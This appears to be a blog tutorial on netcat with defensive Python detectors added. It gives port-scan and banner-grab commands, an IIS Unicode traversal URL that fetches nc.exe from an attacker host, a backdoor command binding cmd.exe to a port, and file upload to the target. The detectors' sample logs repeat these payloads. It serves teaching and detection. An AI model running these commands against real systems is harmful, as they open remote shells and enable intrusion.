Tuesday, January 25, 2022

Another netcat tutorial

Port scanning ports 1 through 200:

nc -v -w2 -z 1-200
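A scan like this leaves a distinctive trace: one source touching many destination ports on one host in a short time. The script below is an added example, not part of the original post, showing how a defender can pick that pattern out of firewall logs. The log format (timestamp, action, protocol, src:port -> dst:port) and the sample lines are constructed for the example; adapt LINE_RE to your firewall's real format.

```python
"""Detect a TCP port sweep of the `nc -z` kind from firewall log lines.

Added example, not from the original post. Log format is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(\S+) (ALLOW|DENY) TCP (\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)$"
)

# Constructed sample: 198.51.100.7 walks ports 1..120 in two minutes (what a
# `nc -z` sweep with a short -w timeout looks like); 203.0.113.5 is ordinary.
SAMPLE_LOG = "\n".join(
    [
        f"2022-01-25T10:0{i // 60}:{i % 60:02d} DENY TCP 198.51.100.7:5{i:04d} -> 192.0.2.10:{i}"
        for i in range(1, 121)
    ]
    + [
        "2022-01-25T10:00:05 ALLOW TCP 203.0.113.5:40213 -> 192.0.2.10:80",
        "2022-01-25T10:00:06 ALLOW TCP 203.0.113.5:40214 -> 192.0.2.10:443",
        "2022-01-25T10:00:07 ALLOW TCP 203.0.113.5:40215 -> 192.0.2.10:80",
    ]
)


def parse(log_text):
    """Group (timestamp, dst_port) events by (src_ip, dst_ip)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsed lines are skipped, not fatal
        ts, _action, src, _sport, dst, dport = m.groups()
        events[(src, dst)].append((datetime.fromisoformat(ts), int(dport)))
    return events


def detect_sweeps(log_text, window_seconds=120, min_ports=20):
    """Return {(src, dst): max distinct destination ports seen inside any
    window of window_seconds} for pairs that reach min_ports."""
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for pair, evs in parse(log_text).items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until the span fits
            while evs[end][0] - evs[start][0] > window:
                start += 1
            distinct = {port for _, port in evs[start : end + 1]}
            if len(distinct) >= min_ports:
                alerts[pair] = max(alerts.get(pair, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for (src, dst), n in detect_sweeps(SAMPLE_LOG).items():
        print(f"possible port sweep: {src} -> {dst}, {n} distinct ports")
```

The threshold and window are the tuning knobs: a short -w timeout makes the sweep faster and denser, so a smaller window still catches it, while ordinary clients rarely touch more than a handful of distinct ports on one host.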


Banner grabbing with nc:

nc -v -n 80

IIS Unicode File Traversal:

Now we want to upload nc.exe to the vulnerable IIS server:

The command we used:
tftp -i GET nc.exe
is transformed into:
http://<exploit URL>/c+TFTP+-i+

As a TFTP server we can use TFTPD32 by Ph. Jounin.


Netcat as a backdoor:

Now we have nc.exe on the server and we want to create a backdoor to get a remote shell.

nc -L -p 1001 -d -e cmd.exe

-L -> keep listening: do not close after a connection ends, wait for the next one.
-p -> port to listen on.
-d -> detach from the console, so the process runs in the background.
-e -> the program to run once a client connects to the port (here cmd.exe).

If we now want to convert this command for Unicode URL use, it will look like this:

http://<exploit URL>/c+nc+-L+-p+1001+-d+-e+cmd.exe

nc -v 80
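Both URL forms above (the TFTP upload and the nc backdoor) pass through the web server's log, so the server side is where a defender sees this. The script below is an added example, not part of the original post: it normalizes request URLs the way the server does, including overlong UTF-8 forms such as %c0%af for "/", before checking for a ".." segment, a cmd.exe path, or a tftp/nc invocation in the query. The log lines are a constructed, simplified W3C-style format (date time c-ip method uri-stem uri-query status) with documentation addresses, not real traffic.

```python
"""Flag encoded-traversal requests that reach cmd.exe and run tftp or nc.

Added example, not from the original post. Log lines are constructed.
Key point: decode the URL (including overlong UTF-8) BEFORE matching "..".
"""
import re

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")
HEX2 = re.compile(r"[0-9A-Fa-f]{2}")
TOOL_NAMES = {"tftp", "tftp.exe", "nc", "nc.exe"}

# Constructed sample: lines 2-4 are traversal requests of the kind described
# above; lines 1 and 5 are benign.
SAMPLE_LOG = """\
2022-01-25 10:15:01 203.0.113.5 GET /default.htm - 200
2022-01-25 10:15:02 198.51.100.7 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+dir 200
2022-01-25 10:15:03 198.51.100.7 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+tftp+-i+198.51.100.7+GET+nc.exe 200
2022-01-25 10:15:04 198.51.100.7 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+nc+-L+-p+1001+-d+-e+cmd.exe 200
2022-01-25 10:15:05 203.0.113.5 GET /images/logo.gif - 200
"""


def percent_decode_bytes(s: str) -> bytes:
    """%XX -> raw byte, '+' -> space; no UTF-8 validation at this stage."""
    out, i = bytearray(), 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s) and HEX2.fullmatch(s[i + 1 : i + 3]):
            out.append(int(s[i + 1 : i + 3], 16))
            i += 3
        elif s[i] == "+":
            out.append(0x20)
            i += 1
        else:
            out.extend(s[i].encode("utf-8"))
            i += 1
    return bytes(out)


def lenient_utf8(b: bytes) -> str:
    """UTF-8 decode that also accepts overlong 2- and 3-byte sequences
    (e.g. C0 AF for '/'), which strict decoders reject."""
    out, i = [], 0

    def cont(k):  # is byte i+k a continuation byte?
        return i + k < len(b) and (b[i + k] & 0xC0) == 0x80

    while i < len(b):
        c = b[i]
        if c < 0x80:
            out.append(chr(c))
            i += 1
        elif 0xC0 <= c < 0xE0 and cont(1):
            out.append(chr(((c & 0x1F) << 6) | (b[i + 1] & 0x3F)))
            i += 2
        elif 0xE0 <= c < 0xF0 and cont(1) and cont(2):
            out.append(chr(((c & 0x0F) << 12) | ((b[i + 1] & 0x3F) << 6) | (b[i + 2] & 0x3F)))
            i += 3
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def normalize(s: str) -> str:
    """Decode repeatedly (catches double encoding like %255c), fold '\\' to '/'."""
    for _ in range(3):
        decoded = lenient_utf8(percent_decode_bytes(s))
        if decoded == s:
            break
        s = decoded
    return s.replace("\\", "/")


def analyze(log_text):
    """Return [(client_ip, decoded_path, [reasons])] for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, client, _method, stem, query, _status = m.groups()
        path = normalize(stem)
        command = normalize(query) if query != "-" else ""
        reasons = []
        if ".." in path.split("/"):
            reasons.append("encoded path traversal")
        if path.lower().endswith("cmd.exe"):
            reasons.append("cmd.exe requested as a web resource")
        if TOOL_NAMES & set(command.lower().split()):
            reasons.append("file-transfer/shell tool in query: " + command)
        if reasons:
            findings.append((client, path, reasons))
    return findings


if __name__ == "__main__":
    for client, path, reasons in analyze(SAMPLE_LOG):
        print(client, path, "; ".join(reasons))
```

A signature that looks for the literal string ".." in the raw request misses every one of the sample lines; the decoded path is what shows the traversal, which is exactly why the server-side check failed in the first place.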



Transferring a file with nc.exe:

We want to transfer a file called hack.txt to the IIS server without using TFTP. We can use nc.exe to transfer the file.

To receive a file named hack.txt on the destination system, start Netcat on the IIS server with the following command:
nc -l -p 1234 > hack.txt

On our source system (the attacking computer) we send a file named hack.txt to the IIS machine with the following command:

nc destination 1234 < hack.txt

Now we can see that the file has been transferred to the target system via port 1234.
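The transfer above is nothing more than a TCP listener writing whatever arrives to a file, and a client writing a file and closing. The script below is an added example, not part of the original post, that reproduces both sides over loopback and adds the check the tutorial does not show: netcat gives neither authentication nor integrity, so whoever connects to the port first becomes "the file", and corruption in transit is silent. Comparing a SHA-256 of what was sent with what was received is the minimum verification. The port (0, meaning any free port, in place of 1234) and the sample file contents are constructed for the example.

```python
"""Reproduce the nc file transfer over loopback and verify integrity.

Added example, not from the original post. Port and payload are constructed.
"""
import hashlib
import socket
import threading


def receive_file(listener: socket.socket) -> bytes:
    """Server side, like `nc -l -p 1234 > hack.txt`: accept one client, read to EOF."""
    conn, _peer = listener.accept()
    chunks = []
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:  # peer closed its write side: end of file
                break
            chunks.append(data)
    return b"".join(chunks)


def send_file(host: str, port: int, payload: bytes) -> str:
    """Client side, like `nc destination 1234 < hack.txt`: send, then close for EOF.
    Returns the SHA-256 of what was sent, for out-of-band comparison."""
    with socket.create_connection((host, port)) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
    return hashlib.sha256(payload).hexdigest()


def transfer(payload: bytes, port: int = 0):
    """Run both sides over 127.0.0.1 (port 0 = any free port, standing in for 1234).
    Returns (received_bytes, digests_match)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", port))
    listener.listen(1)
    result = {}
    t = threading.Thread(target=lambda: result.update(data=receive_file(listener)))
    t.start()
    sent_digest = send_file("127.0.0.1", listener.getsockname()[1], payload)
    t.join()
    listener.close()
    received = result["data"]
    verified = hashlib.sha256(received).hexdigest() == sent_digest
    return received, verified


if __name__ == "__main__":
    sample = b"constructed contents of hack.txt\n" * 1000  # constructed sample file
    data, ok = transfer(sample)
    print(len(data), "bytes received, integrity", "OK" if ok else "MISMATCH")
```

On the defensive side, the same mechanics are the detection: an unexpected process holding a listening socket on a server, and a single inbound connection that writes a file to disk, are both worth alerting on.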